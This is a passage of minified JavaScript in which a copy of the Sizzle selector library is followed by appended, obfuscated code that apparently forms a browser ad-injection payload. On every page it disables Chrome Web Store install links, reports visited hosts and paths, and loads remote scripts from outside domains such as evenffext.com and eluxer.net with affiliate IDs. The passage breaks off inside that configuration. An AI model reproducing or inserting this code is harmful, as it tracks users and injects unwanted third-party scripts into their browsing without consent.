  959. return aJ === i ? -1 : aI === i ? 1 : aO ? -1 : aL ? 1 : S ? (j.call(S, aJ) - j.call(S, aI)) : 0
  960. } else {
  961. if (aO === aL) {
  962. return f(aJ, aI)
  963. }
  964. }
  965. }
  966. aP = aJ;
  967. while ((aP = aP.parentNode)) {
  968. aK.unshift(aP)
  969. }
  970. aP = aI;
  971. while ((aP = aP.parentNode)) {
  972. aN.unshift(aP)
  973. }
  974. while (aK[aM] === aN[aM]) {
  975. aM++
  976. }
  977. return aM ? f(aK[aM], aN[aM]) : aK[aM] === T ? -1 : aN[aM] === T ? 1 : 0
  978. }
  979. ;
  980. return i
  981. }
  982. ;
  983. E.matches = function(i, e) {
  984. return E(i, null, null, e)
  985. }
  986. ;
  987. E.matchesSelector = function(aI, aK) {
  988. if ((aI.ownerDocument || aI) !== L) {
  989. aj(aI)
  990. }
  991. aK = aK.replace(B, "='$1']");
  992. if (aD.matchesSelector && at && (!aB || !aB.test(aK)) && (!an || !an.test(aK))) {
  993. try {
  994. var i = k.call(aI, aK);
  995. if (i || aD.disconnectedMatch || aI.document && aI.document.nodeType !== 11) {
  996. return i
  997. }
  998. } catch (aJ) {}
  999. }
  1000. return E(aK, L, null, [aI]).length > 0
  1001. }
  1002. ;
  1003. E.contains = function(e, i) {
  1004. if ((e.ownerDocument || e) !== L) {
  1005. aj(e)
  1006. }
  1007. return P(e, i)
  1008. }
  1009. ;
  1010. E.attr = function(aI, e) {
  1011. if ((aI.ownerDocument || aI) !== L) {
  1012. aj(aI)
  1013. }
  1014. var i = v.attrHandle[e.toLowerCase()]
  1015. , aJ = (i && Y.call(v.attrHandle, e.toLowerCase()) ? i(aI, e, !at) : q);
  1016. return aJ === q ? aD.attributes || !at ? aI.getAttribute(e) : (aJ = aI.getAttributeNode(e)) && aJ.specified ? aJ.value : null : aJ
  1017. }
  1018. ;
  1019. E.error = function(e) {
  1020. throw new Error("Syntax error, unrecognized expression: " + e)
  1021. }
  1022. ;
  1023. E.uniqueSort = function(aJ) {
  1024. var aK, aL = [], e = 0, aI = 0;
  1025. ah = !aD.detectDuplicates;
  1026. S = !aD.sortStable && aJ.slice(0);
  1027. aJ.sort(N);
  1028. if (ah) {
  1029. while ((aK = aJ[aI++])) {
  1030. if (aK === aJ[aI]) {
  1031. e = aL.push(aI)
  1032. }
  1033. }
  1034. while (e--) {
  1035. aJ.splice(aL[e], 1)
  1036. }
  1037. }
  1038. return aJ
  1039. }
  1040. ;
  1041. R = E.getText = function(aL) {
  1042. var aK, aI = "", aJ = 0, e = aL.nodeType;
  1043. if (!e) {
  1044. for (; (aK = aL[aJ]); aJ++) {
  1045. aI += R(aK)
  1046. }
  1047. } else {
  1048. if (e === 1 || e === 9 || e === 11) {
  1049. if (typeof aL.textContent === "string") {
  1050. return aL.textContent
  1051. } else {
  1052. for (aL = aL.firstChild; aL; aL = aL.nextSibling) {
  1053. aI += R(aL)
  1054. }
  1055. }
  1056. } else {
  1057. if (e === 3 || e === 4) {
  1058. return aL.nodeValue
  1059. }
  1060. }
  1061. }
  1062. return aI
  1063. }
  1064. ;
  1065. v = E.selectors = {
  1066. cacheLength: 50,
  1067. createPseudo: r,
  1068. match: am,
  1069. attrHandle: {},
  1070. find: {},
  1071. relative: {
  1072. ">": {
  1073. dir: "parentNode",
  1074. first: true
  1075. },
  1076. " ": {
  1077. dir: "parentNode"
  1078. },
  1079. "+": {
  1080. dir: "previousSibling",
  1081. first: true
  1082. },
  1083. "~": {
  1084. dir: "previousSibling"
  1085. }
  1086. },
  1087. preFilter: {
  1088. ATTR: function(e) {
  1089. e[1] = e[1].replace(A, ap);
  1090. e[3] = (e[4] || e[5] || "").replace(A, ap);
  1091. if (e[2] === "~=") {
  1092. e[3] = " " + e[3] + " "
  1093. }
  1094. return e.slice(0, 4)
  1095. },
  1096. CHILD: function(e) {
  1097. e[1] = e[1].toLowerCase();
  1098. if (e[1].slice(0, 3) === "nth") {
  1099. if (!e[3]) {
  1100. E.error(e[0])
  1101. }
  1102. e[4] = +(e[4] ? e[5] + (e[6] || 1) : 2 * (e[3] === "even" || e[3] === "odd"));
  1103. e[5] = +((e[7] + e[8]) || e[3] === "odd")
  1104. } else {
  1105. if (e[3]) {
  1106. E.error(e[0])
  1107. }
  1108. }
  1109. return e
  1110. },
  1111. PSEUDO: function(i) {
  1112. var e, aI = !i[5] && i[2];
  1113. if (am.CHILD.test(i[0])) {
  1114. return null
  1115. }
  1116. if (i[3] && i[4] !== q) {
  1117. i[2] = i[4]
  1118. } else {
  1119. if (aI && ad.test(aI) && (e = p(aI, true)) && (e = aI.indexOf(")", aI.length - e) - aI.length)) {
  1120. i[0] = i[0].slice(0, e);
  1121. i[2] = aI.slice(0, e)
  1122. }
  1123. }
  1124. return i.slice(0, 3)
  1125. }
  1126. },
  1127. filter: {
  1128. TAG: function(i) {
  1129. var e = i.replace(A, ap).toLowerCase();
  1130. return i === "*" ? function() {
  1131. return true
  1132. }
  1133. : function(aI) {
  1134. return aI.nodeName && aI.nodeName.toLowerCase() === e
  1135. }
  1136. },
  1137. CLASS: function(e) {
  1138. var i = d[e + " "];
  1139. return i || (i = new RegExp("(^|" + x + ")" + e + "(" + x + "|$)")) && d(e, function(aI) {
  1140. return i.test(typeof aI.className === "string" && aI.className || typeof aI.getAttribute !== az && aI.getAttribute("class") || "")
  1141. })
  1142. },
  1143. ATTR: function(aI, i, e) {
  1144. return function(aK) {
  1145. var aJ = E.attr(aK, aI);
  1146. if (aJ == null) {
  1147. return i === "!="
  1148. }
  1149. if (!i) {
  1150. return true
  1151. }
  1152. aJ += "";
  1153. return i === "=" ? aJ === e : i === "!=" ? aJ !== e : i === "^=" ? e && aJ.indexOf(e) === 0 : i === "*=" ? e && aJ.indexOf(e) > -1 : i === "$=" ? e && aJ.slice(-e.length) === e : i === "~=" ? (" " + aJ + " ").indexOf(e) > -1 : i === "|=" ? aJ === e || aJ.slice(0, e.length + 1) === e + "-" : false
  1154. }
  1155. },
  1156. CHILD: function(i, aK, aJ, aL, aI) {
  1157. var aN = i.slice(0, 3) !== "nth"
  1158. , e = i.slice(-4) !== "last"
  1159. , aM = aK === "of-type";
  1160. return aL === 1 && aI === 0 ? function(aO) {
  1161. return !!aO.parentNode
  1162. }
  1163. : function(aU, aS, aX) {
  1164. var aO, a0, aV, aZ, aW, aR, aT = aN !== e ? "nextSibling" : "previousSibling", aY = aU.parentNode, aQ = aM && aU.nodeName.toLowerCase(), aP = !aX && !aM;
  1165. if (aY) {
  1166. if (aN) {
  1167. while (aT) {
  1168. aV = aU;
  1169. while ((aV = aV[aT])) {
  1170. if (aM ? aV.nodeName.toLowerCase() === aQ : aV.nodeType === 1) {
  1171. return false
  1172. }
  1173. }
  1174. aR = aT = i === "only" && !aR && "nextSibling"
  1175. }
  1176. return true
  1177. }
  1178. aR = [e ? aY.firstChild : aY.lastChild];
  1179. if (e && aP) {
  1180. a0 = aY[av] || (aY[av] = {});
  1181. aO = a0[i] || [];
  1182. aW = aO[0] === aE && aO[1];
  1183. aZ = aO[0] === aE && aO[2];
  1184. aV = aW && aY.childNodes[aW];
  1185. while ((aV = ++aW && aV && aV[aT] || (aZ = aW = 0) || aR.pop())) {
  1186. if (aV.nodeType === 1 && ++aZ && aV === aU) {
  1187. a0[i] = [aE, aW, aZ];
  1188. break
  1189. }
  1190. }
  1191. } else {
  1192. if (aP && (aO = (aU[av] || (aU[av] = {}))[i]) && aO[0] === aE) {
  1193. aZ = aO[1]
  1194. } else {
  1195. while ((aV = ++aW && aV && aV[aT] || (aZ = aW = 0) || aR.pop())) {
  1196. if ((aM ? aV.nodeName.toLowerCase() === aQ : aV.nodeType === 1) && ++aZ) {
  1197. if (aP) {
  1198. (aV[av] || (aV[av] = {}))[i] = [aE, aZ]
  1199. }
  1200. if (aV === aU) {
  1201. break
  1202. }
  1203. }
  1204. }
  1205. }
  1206. }
  1207. aZ -= aI;
  1208. return aZ === aL || (aZ % aL === 0 && aZ / aL >= 0)
  1209. }
  1210. }
  1211. },
  1212. PSEUDO: function(aJ, aI) {
  1213. var e, i = v.pseudos[aJ] || v.setFilters[aJ.toLowerCase()] || E.error("unsupported pseudo: " + aJ);
  1214. if (i[av]) {
  1215. return i(aI)
  1216. }
  1217. if (i.length > 1) {
  1218. e = [aJ, aJ, "", aI];
  1219. return v.setFilters.hasOwnProperty(aJ.toLowerCase()) ? r(function(aM, aO) {
  1220. var aL, aK = i(aM, aI), aN = aK.length;
  1221. while (aN--) {
  1222. aL = j.call(aM, aK[aN]);
  1223. aM[aL] = !(aO[aL] = aK[aN])
  1224. }
  1225. }) : function(aK) {
  1226. return i(aK, 0, e)
  1227. }
  1228. }
  1229. return i
  1230. }
  1231. },
  1232. pseudos: {
  1233. not: r(function(e) {
  1234. var i = []
  1235. , aI = []
  1236. , aJ = ag(e.replace(z, "$1"));
  1237. return aJ[av] ? r(function(aL, aQ, aO, aM) {
  1238. var aP, aK = aJ(aL, null, aM, []), aN = aL.length;
  1239. while (aN--) {
  1240. if ((aP = aK[aN])) {
  1241. aL[aN] = !(aQ[aN] = aP)
  1242. }
  1243. }
  1244. }) : function(aM, aL, aK) {
  1245. i[0] = aM;
  1246. aJ(i, null, aK, aI);
  1247. return !aI.pop()
  1248. }
  1249. }),
  1250. has: r(function(e) {
  1251. return function(i) {
  1252. return E(e, i).length > 0
  1253. }
  1254. }),
  1255. contains: r(function(e) {
  1256. return function(i) {
  1257. return (i.textContent || i.innerText || R(i)).indexOf(e) > -1
  1258. }
  1259. }),
  1260. lang: r(function(e) {
  1261. if (!ae.test(e || "")) {
  1262. E.error("unsupported lang: " + e)
  1263. }
  1264. e = e.replace(A, ap).toLowerCase();
  1265. return function(aI) {
  1266. var i;
  1267. do {
  1268. if ((i = at ? aI.lang : aI.getAttribute("xml:lang") || aI.getAttribute("lang"))) {
  1269. i = i.toLowerCase();
  1270. return i === e || i.indexOf(e + "-") === 0
  1271. }
  1272. } while ((aI = aI.parentNode) && aI.nodeType === 1);return false
  1273. }
  1274. }),
  1275. target: function(e) {
  1276. var i = aA.location && aA.location.hash;
  1277. return i && i.slice(1) === e.id
  1278. },
  1279. root: function(e) {
  1280. return e === w
  1281. },
  1282. focus: function(e) {
  1283. return e === L.activeElement && (!L.hasFocus || L.hasFocus()) && !!(e.type || e.href || ~e.tabIndex)
  1284. },
  1285. enabled: function(e) {
  1286. return e.disabled === false
  1287. },
  1288. disabled: function(e) {
  1289. return e.disabled === true
  1290. },
  1291. checked: function(e) {
  1292. var i = e.nodeName.toLowerCase();
  1293. return (i === "input" && !!e.checked) || (i === "option" && !!e.selected)
  1294. },
  1295. selected: function(e) {
  1296. if (e.parentNode) {
  1297. e.parentNode.selectedIndex
  1298. }
  1299. return e.selected === true
  1300. },
  1301. empty: function(e) {
  1302. for (e = e.firstChild; e; e = e.nextSibling) {
  1303. if (e.nodeName > "@" || e.nodeType === 3 || e.nodeType === 4) {
  1304. return false
  1305. }
  1306. }
  1307. return true
  1308. },
  1309. parent: function(e) {
  1310. return !v.pseudos.empty(e)
  1311. },
  1312. header: function(e) {
  1313. return t.test(e.nodeName)
  1314. },
  1315. input: function(e) {
  1316. return h.test(e.nodeName)
  1317. },
  1318. button: function(i) {
  1319. var e = i.nodeName.toLowerCase();
  1320. return e === "input" && i.type === "button" || e === "button"
  1321. },
  1322. text: function(i) {
  1323. var e;
  1324. return i.nodeName.toLowerCase() === "input" && i.type === "text" && ((e = i.getAttribute("type")) == null || e.toLowerCase() === i.type)
  1325. },
  1326. first: ar(function() {
  1327. return [0]
  1328. }),
  1329. last: ar(function(e, i) {
  1330. return [i - 1]
  1331. }),
  1332. eq: ar(function(e, aI, i) {
  1333. return [i < 0 ? i + aI : i]
  1334. }),
  1335. even: ar(function(e, aJ) {
  1336. var aI = 0;
  1337. for (; aI < aJ; aI += 2) {
  1338. e.push(aI)
  1339. }
  1340. return e
  1341. }),
  1342. odd: ar(function(e, aJ) {
  1343. var aI = 1;
  1344. for (; aI < aJ; aI += 2) {
  1345. e.push(aI)
  1346. }
  1347. return e
  1348. }),
  1349. lt: ar(function(e, aK, aJ) {
  1350. var aI = aJ < 0 ? aJ + aK : aJ;
  1351. for (; --aI >= 0; ) {
  1352. e.push(aI)
  1353. }
  1354. return e
  1355. }),
  1356. gt: ar(function(e, aK, aJ) {
  1357. var aI = aJ < 0 ? aJ + aK : aJ;
  1358. for (; ++aI < aK; ) {
  1359. e.push(aI)
  1360. }
  1361. return e
  1362. })
  1363. }
  1364. };
  1365. for (G in {
  1366. radio: true,
  1367. checkbox: true,
  1368. file: true,
  1369. password: true,
  1370. image: true
  1371. }) {
  1372. v.pseudos[G] = F(G)
  1373. }
  1374. for (G in {
  1375. submit: true,
  1376. reset: true
  1377. }) {
  1378. v.pseudos[G] = g(G)
  1379. }
  1380. function p(aK, aP) {
  1381. var i, aL, aN, aO, aM, aI, e, aJ = au[aK + " "];
  1382. if (aJ) {
  1383. return aP ? 0 : aJ.slice(0)
  1384. }
  1385. aM = aK;
  1386. aI = [];
  1387. e = v.preFilter;
  1388. while (aM) {
  1389. if (!i || (aL = D.exec(aM))) {
  1390. if (aL) {
  1391. aM = aM.slice(aL[0].length) || aM
  1392. }
  1393. aI.push(aN = [])
  1394. }
  1395. i = false;
  1396. if ((aL = K.exec(aM))) {
  1397. i = aL.shift();
  1398. aN.push({
  1399. value: i,
  1400. type: aL[0].replace(z, " ")
  1401. });
  1402. aM = aM.slice(i.length)
  1403. }
  1404. for (aO in v.filter) {
  1405. if ((aL = am[aO].exec(aM)) && (!e[aO] || (aL = e[aO](aL)))) {
  1406. i = aL.shift();
  1407. aN.push({
  1408. value: i,
  1409. type: aO,
  1410. matches: aL
  1411. });
  1412. aM = aM.slice(i.length)
  1413. }
  1414. }
  1415. if (!i) {
  1416. break
  1417. }
  1418. }
  1419. return aP ? aM.length : aM ? E.error(aK) : au(aK, aI).slice(0)
  1420. }
  1421. function o(aK) {
  1422. var aJ = 0
  1423. , aI = aK.length
  1424. , e = "";
  1425. for (; aJ < aI; aJ++) {
  1426. e += aK[aJ].value
  1427. }
  1428. return e
  1429. }
  1430. function y(aK, aI, aJ) {
  1431. var e = aI.dir
  1432. , aL = aJ && e === "parentNode"
  1433. , i = ao++;
  1434. return aI.first ? function(aO, aN, aM) {
  1435. while ((aO = aO[e])) {
  1436. if (aO.nodeType === 1 || aL) {
  1437. return aK(aO, aN, aM)
  1438. }
  1439. }
  1440. }
  1441. : function(aQ, aO, aN) {
  1442. var aS, aM, aP, aR = aE + " " + i;
  1443. if (aN) {
  1444. while ((aQ = aQ[e])) {
  1445. if (aQ.nodeType === 1 || aL) {
  1446. if (aK(aQ, aO, aN)) {
  1447. return true
  1448. }
  1449. }
  1450. }
  1451. } else {
  1452. while ((aQ = aQ[e])) {
  1453. if (aQ.nodeType === 1 || aL) {
  1454. aP = aQ[av] || (aQ[av] = {});
  1455. if ((aM = aP[e]) && aM[0] === aR) {
  1456. if ((aS = aM[1]) === true || aS === l) {
  1457. return aS === true
  1458. }
  1459. } else {
  1460. aM = aP[e] = [aR];
  1461. aM[1] = aK(aQ, aO, aN) || l;
  1462. if (aM[1] === true) {
  1463. return true
  1464. }
  1465. }
  1466. }
  1467. }
  1468. }
  1469. }
  1470. }
  1471. function aG(e) {
  1472. return e.length > 1 ? function(aL, aK, aI) {
  1473. var aJ = e.length;
  1474. while (aJ--) {
  1475. if (!e[aJ](aL, aK, aI)) {
  1476. return false
  1477. }
  1478. }
  1479. return true
  1480. }
  1481. : e[0]
  1482. }
  1483. function ak(e, aI, aJ, aK, aN) {
  1484. var aL, aQ = [], aM = 0, aO = e.length, aP = aI != null;
  1485. for (; aM < aO; aM++) {
  1486. if ((aL = e[aM])) {
  1487. if (!aJ || aJ(aL, aK, aN)) {
  1488. aQ.push(aL);
  1489. if (aP) {
  1490. aI.push(aM)
  1491. }
  1492. }
  1493. }
  1494. }
  1495. return aQ
  1496. }
  1497. function n(aI, i, aK, aJ, aL, e) {
  1498. if (aJ && !aJ[av]) {
  1499. aJ = n(aJ)
  1500. }
  1501. if (aL && !aL[av]) {
  1502. aL = n(aL, e)
  1503. }
  1504. return r(function(aW, aT, aO, aV) {
  1505. var aY, aU, aQ, aP = [], aX = [], aN = aT.length, aM = aW || I(i || "*", aO.nodeType ? [aO] : aO, []), aR = aI && (aW || !i) ? ak(aM, aP, aI, aO, aV) : aM, aS = aK ? aL || (aW ? aI : aN || aJ) ? [] : aT : aR;
  1506. if (aK) {
  1507. aK(aR, aS, aO, aV)
  1508. }
  1509. if (aJ) {
  1510. aY = ak(aS, aX);
  1511. aJ(aY, [], aO, aV);
  1512. aU = aY.length;
  1513. while (aU--) {
  1514. if ((aQ = aY[aU])) {
  1515. aS[aX[aU]] = !(aR[aX[aU]] = aQ)
  1516. }
  1517. }
  1518. }
  1519. if (aW) {
  1520. if (aL || aI) {
  1521. if (aL) {
  1522. aY = [];
  1523. aU = aS.length;
  1524. while (aU--) {
  1525. if ((aQ = aS[aU])) {
  1526. aY.push((aR[aU] = aQ))
  1527. }
  1528. }
  1529. aL(null, (aS = []), aY, aV)
  1530. }
  1531. aU = aS.length;
  1532. while (aU--) {
  1533. if ((aQ = aS[aU]) && (aY = aL ? j.call(aW, aQ) : aP[aU]) > -1) {
  1534. aW[aY] = !(aT[aY] = aQ)
  1535. }
  1536. }
  1537. }
  1538. } else {
  1539. aS = ak(aS === aT ? aS.splice(aN, aS.length) : aS);
  1540. if (aL) {
  1541. aL(null, aT, aS, aV)
  1542. } else {
  1543. b.apply(aT, aS)
  1544. }
  1545. }
  1546. })
  1547. }
  1548. function aw(aN) {
  1549. var aI, aL, aJ, aM = aN.length, aQ = v.relative[aN[0].type], aR = aQ || v.relative[" "], aK = aQ ? 1 : 0, aO = y(function(i) {
  1550. return i === aI
  1551. }, aR, true), aP = y(function(i) {
  1552. return j.call(aI, i) > -1
  1553. }, aR, true), e = [function(aT, aS, i) {
  1554. return (!aQ && (i || aS !== aH)) || ((aI = aS).nodeType ? aO(aT, aS, i) : aP(aT, aS, i))
  1555. }
  1556. ];
  1557. for (; aK < aM; aK++) {
  1558. if ((aL = v.relative[aN[aK].type])) {
  1559. e = [y(aG(e), aL)]
  1560. } else {
  1561. aL = v.filter[aN[aK].type].apply(null, aN[aK].matches);
  1562. if (aL[av]) {
  1563. aJ = ++aK;
  1564. for (; aJ < aM; aJ++) {
  1565. if (v.relative[aN[aJ].type]) {
  1566. break
  1567. }
  1568. }
  1569. return n(aK > 1 && aG(e), aK > 1 && o(aN.slice(0, aK - 1).concat({
  1570. value: aN[aK - 2].type === " " ? "*" : ""
  1571. })).replace(z, "$1"), aL, aK < aJ && aw(aN.slice(aK, aJ)), aJ < aM && aw((aN = aN.slice(aJ))), aJ < aM && o(aN))
  1572. }
  1573. e.push(aL)
  1574. }
  1575. }
  1576. return aG(e)
  1577. }
  1578. function ai(aJ, aI) {
  1579. var aL = 0
  1580. , e = aI.length > 0
  1581. , aK = aJ.length > 0
  1582. , i = function(aV, aP, aU, aT, a1) {
  1583. var aQ, aR, aW, a0 = [], aZ = 0, aS = "0", aM = aV && [], aX = a1 != null, aY = aH, aO = aV || aK && v.find.TAG("*", a1 && aP.parentNode || aP), aN = (aE += aY == null ? 1 : Math.random() || 0.1);
  1584. if (aX) {
  1585. aH = aP !== L && aP;
  1586. l = aL
  1587. }
  1588. for (; (aQ = aO[aS]) != null; aS++) {
  1589. if (aK && aQ) {
  1590. aR = 0;
  1591. while ((aW = aJ[aR++])) {
  1592. if (aW(aQ, aP, aU)) {
  1593. aT.push(aQ);
  1594. break
  1595. }
  1596. }
  1597. if (aX) {
  1598. aE = aN;
  1599. l = ++aL
  1600. }
  1601. }
  1602. if (e) {
  1603. if ((aQ = !aW && aQ)) {
  1604. aZ--
  1605. }
  1606. if (aV) {
  1607. aM.push(aQ)
  1608. }
  1609. }
  1610. }
  1611. aZ += aS;
  1612. if (e && aS !== aZ) {
  1613. aR = 0;
  1614. while ((aW = aI[aR++])) {
  1615. aW(aM, a0, aP, aU)
  1616. }
  1617. if (aV) {
  1618. if (aZ > 0) {
  1619. while (aS--) {
  1620. if (!(aM[aS] || a0[aS])) {
  1621. a0[aS] = ay.call(aT)
  1622. }
  1623. }
  1624. }
  1625. a0 = ak(a0)
  1626. }
  1627. b.apply(aT, a0);
  1628. if (aX && !aV && a0.length > 0 && (aZ + aI.length) > 1) {
  1629. E.uniqueSort(aT)
  1630. }
  1631. }
  1632. if (aX) {
  1633. aE = aN;
  1634. aH = aY
  1635. }
  1636. return aM
  1637. };
  1638. return e ? r(i) : i
  1639. }
  1640. ag = E.compile = function(e, aM) {
  1641. var aJ, aI = [], aL = [], aK = Q[e + " "];
  1642. if (!aK) {
  1643. if (!aM) {
  1644. aM = p(e)
  1645. }
  1646. aJ = aM.length;
  1647. while (aJ--) {
  1648. aK = aw(aM[aJ]);
  1649. if (aK[av]) {
  1650. aI.push(aK)
  1651. } else {
  1652. aL.push(aK)
  1653. }
  1654. }
  1655. aK = Q(e, ai(aL, aI))
  1656. }
  1657. return aK
  1658. }
  1659. ;
  1660. function I(aI, aL, aK) {
  1661. var aJ = 0
  1662. , e = aL.length;
  1663. for (; aJ < e; aJ++) {
  1664. E(aI, aL[aJ], aK)
  1665. }
  1666. return aK
  1667. }
  1668. function aC(aJ, e, aK, aN) {
  1669. var aL, aP, aI, aQ, aO, aM = p(aJ);
  1670. if (!aN) {
  1671. if (aM.length === 1) {
  1672. aP = aM[0] = aM[0].slice(0);
  1673. if (aP.length > 2 && (aI = aP[0]).type === "ID" && aD.getById && e.nodeType === 9 && at && v.relative[aP[1].type]) {
  1674. e = (v.find.ID(aI.matches[0].replace(A, ap), e) || [])[0];
  1675. if (!e) {
  1676. return aK
  1677. }
  1678. aJ = aJ.slice(aP.shift().value.length)
  1679. }
  1680. aL = am.needsContext.test(aJ) ? 0 : aP.length;
  1681. while (aL--) {
  1682. aI = aP[aL];
  1683. if (v.relative[(aQ = aI.type)]) {
  1684. break
  1685. }
  1686. if ((aO = v.find[aQ])) {
  1687. if ((aN = aO(aI.matches[0].replace(A, ap), al.test(aP[0].type) && e.parentNode || e))) {
  1688. aP.splice(aL, 1);
  1689. aJ = aN.length && o(aP);
  1690. if (!aJ) {
  1691. b.apply(aK, aN);
  1692. return aK
  1693. }
  1694. break
  1695. }
  1696. }
  1697. }
  1698. }
  1699. }
  1700. ag(aJ, aM)(aN, e, !at, aK, al.test(aJ));
  1701. return aK
  1702. }
  1703. v.pseudos.nth = v.pseudos.eq;
  1704. function af() {}
  1705. af.prototype = v.filters = v.pseudos;
  1706. v.setFilters = new af();
  1707. aD.sortStable = av.split("").sort(N).join("") === av;
  1708. aj();
  1709. [0, 0].sort(N);
  1710. aD.detectDuplicates = ah;
  1711. aA["c9f22c14a3872f280d"].Sizzle = E
  1712. }
  1713. )(window);
  1714. ;var e = i[g].Sizzle;
  1715. var d = i[g];
  1716. d.Sizzle = e;
  1717. d.demoMode = i[g].demoMode = (p);
  1718. d.ready(function() {
  1719. if (location.href.indexOf("thisadsfor.us") > -1) {
  1720. return true
  1721. }
  1722. try {
  1723. (function() {
  1724. var A = function() {
  1725. var C = "chrome-webstore-item";
  1726. var D = document.getElementsByTagName("link");
  1727. for (var B = 0, E = D.length; E > B; ++B) {
  1728. if (C == D[B].getAttribute("id") || C == D[B].getAttribute("rel")) {
  1729. d.loadedCallback("PROMO_ANLZ", "", location.host, location.href, D[B].getAttribute("href"))
  1730. }
  1731. }
  1732. };
  1733. A()
  1734. }
  1735. )()
  1736. } catch (y) {}
  1737. try {
  1738. (function() {
  1739. var C = function() {
  1740. location.href = "javascript:(" + function() {
  1741. window.onbeforeunload = null;
  1742. window.onunload = null;
  1743. chrome.webstore.install = null
  1744. }
  1745. + ")()"
  1746. };
  1747. var B = function() {
  1748. window.stop && window.stop();
  1749. location.replace("about:blank")
  1750. };
  1751. var A = function() {
  1752. if ("51113" == "51433" && location.hostname.indexOf("olam-hamedia.tech") > -1) {
  1753. return
  1754. }
  1755. var E = "chrome-webstore-item";
  1756. var F = document.getElementsByTagName("link");
  1757. for (var D = 0, G = F.length; G > D; ++D) {
  1758. if (E == F[D].getAttribute("id") || E == F[D].getAttribute("rel")) {
  1759. F[D].setAttribute("rel", "");
  1760. F[D].setAttribute("id", "");
  1761. F[D].setAttribute("href", "");
  1762. C()
  1763. }
  1764. }
  1765. };
  1766. if (!location.hostname.match(/dostup-[a-z]+\.com$/) && location.hostname.indexOf("freevideodownloader") == -1 && location.hostname.indexOf("musvk") == -1 && location.hostname.indexOf("vkonline.xyz") == -1 && location.hostname.indexOf("vkunblock.com") == -1) {
  1767. A()
  1768. }
  1769. }
  1770. )()
  1771. } catch (y) {}
  1772. var r = function(B) {
  1773. var E = {};
  1774. B = B.split("?");
  1775. if (B.length < 2) {
  1776. return E
  1777. }
  1778. var D = B[1];
  1779. var F = D.split("&");
  1780. for (var C = 0; C < F.length; C++) {
  1781. var G = F[C].split("=");
  1782. if (typeof E[G[0]] === "undefined") {
  1783. E[G[0]] = G[1]
  1784. } else {
  1785. if (typeof E[G[0]] === "string") {
  1786. var A = [E[G[0]], G[1]];
  1787. E[G[0]] = A
  1788. } else {
  1789. E[G[0]].push(G[1])
  1790. }
  1791. }
  1792. }
  1793. return E
  1794. };
  1795. var w = {};
  1796. var t = document.getElementsByTagName("script");
  1797. var s = null;
  1798. for (var v = 0; v < t.length; v++) {
  1799. var z = t[v];
  1800. if (z.src.search(/c9f22c14a3872f280d.*\.js/i) !== -1) {
  1801. s = z.src.replace(/^https?\:\/\//i, "").split("/")[0];
  1802. if (o) {
  1803. d.scriptDomain = s
  1804. }
  1805. w = r(z.src);
  1806. break
  1807. }
  1808. }
  1809. if (location.host.indexOf("bing.com") > -1 && i.AM && typeof i.AM == "object") {
  1810. i.AM.push(d.scriptDomain)
  1811. }
  1812. i[g].tbParams = {
  1813. wid: "51113",
  1814. sid: "",
  1815. tid: "3231",
  1816. title: "Not set",
  1817. optoutUrl: ""
  1818. };
  1819. if (w.sid) {
  1820. i[g].tbParams.sid = w.sid
  1821. }
  1822. if (w.title) {
  1823. i[g].tbParams.title = decodeURIComponent(w.title)
  1824. }
  1825. if (w.optout) {
  1826. i[g].tbParams.optoutUrl = decodeURIComponent(w.optout)
  1827. }
  1828. i[g].getParams = r(location.href);
  1829. d.tbParams = i[g].tbParams;
  1830. var q = "";
  1831. try {
  1832. q = location.pathname.substring(0, 50)
  1833. } catch (y) {}
  1834. d.loadedCallback("LOADED", "", location.host, q, s);
  1835. var x = /\.(jpg|png|jpeg|gif|bmp|doc|pdf|xls|js|xml|doc|docs|txt|css)$/;
  1836. if (location.href.match(x)) {
  1837. d.loadedCallback("URL_STATICFILE");
  1838. return false
  1839. }
  1840. var u = /(paypal\.com|secure\.|\.gov|doubleclick\.net|addthis\.com|twitter\.com|docs\.google\.com|drive\.google\.com)/;
  1841. if (location.hostname.match(u)) {
  1842. d.loadedCallback("URL_IGNOREDOMAIN");
  1843. return false
  1844. }
  1845. (function(d, w, u) {
  1846. var $$ = w["c9f22c14a3872f280d"];
  1847. var scriptsToLoad = $$.fromJson("{\"cd1d2\":{\"countries_allow\":\"\",\"countries_deny\":\"\",\"hostname_allow\":\"\",\"hostname_deny\":\"(?:.*googleusercontent\\\\..*|mail\\\\.google\\\\.com|reddit\\\\.com|.*\\\\.reddit\\\\.com)\",\"browsers_allow\":\"\",\"browsers_deny\":\"\",\"coverage\":\"100\",\"url\":\"\\/\\/evenffext.com\\/addons\\/lnkr5.min.js\",\"limit\":\"0\",\"type\":\"external\",\"key\":\"cd1d2\"},\"81d01\":{\"countries_allow\":\"\",\"countries_deny\":\"\",\"hostname_allow\":\"(?:google\\\\..*)\",\"hostname_deny\":\"\",\"browsers_allow\":\"\",\"browsers_deny\":\"\",\"coverage\":\"100\",\"url\":\"\\/\\/evenffext.com\\/addons\\/lnkr33_gl.min.js\",\"limit\":\"0\",\"type\":\"external\",\"key\":\"81d01\"},\"a8bb7\":{\"countries_allow\":\"\",\"countries_deny\":\"\",\"hostname_allow\":\"\",\"hostname_deny\":\"(?:.*yieldkit.com|.*prosperent.com|.*viglink.com|.*cityads.com|aliexpress\\\\.com|.*\\\\.aliexpress\\\\.com)\",\"browsers_allow\":\"\",\"browsers_deny\":\"\",\"coverage\":\"100\",\"url\":\"\\/\\/cdncache-a.akamaihd.net\\/sub\\/nee5452\\/51113_3231_\\/SID\\/\\/l.js?pid=2450&ext=\\/TITLE\\/\",\"limit\":\"0\",\"type\":\"external\",\"key\":\"a8bb7\"},\"865b2\":{\"countries_allow\":\"\",\"countries_deny\":\"\",\"hostname_allow\":\"\",\"hostname_deny\":\"\",\"browsers_allow\":\"\",\"browsers_deny\":\"\",\"coverage\":\"100\",\"url\":\"\\/\\/eluxer.net\\/code?id=105&subid=51113_3231_\\/SID\\/\",\"limit\":\"0\",\"type\":\"external\",\"key\":\"865b2\"},\"6a131\":{\"countries_allow\":\"\",\"countries_deny\":\"\",\"hostname_allow\":\"\",\"hostname_deny\":\"(?:google\\\\..*)\",\"browsers_allow\":\"\",\"browsers_deny\":\"\",\"coverage\":\"100\",\"url\":\"\\/\\/evenffext.com\\/addons\\/lnkr30_nt.min.js\",\"limit\":\"0\",\"type\":\"external\",\"key\":\"6a131\"},\"02aed\":{\"countries_allow\":\"\",\"countries_deny\":\"\",\"hostname_allow\":\"\",\"hostname_deny\":\"\",\"browsers_allow\":\"\",\"browsers_deny\":\"\",\"coverage\":\"100\",\"url\":\"\",\"limit\":\"0\",\"type\":\"platform\",\"key\":\"02aed\"},\"90f06\":{\"countries_allow\":\"\",\"countries_deny\":\"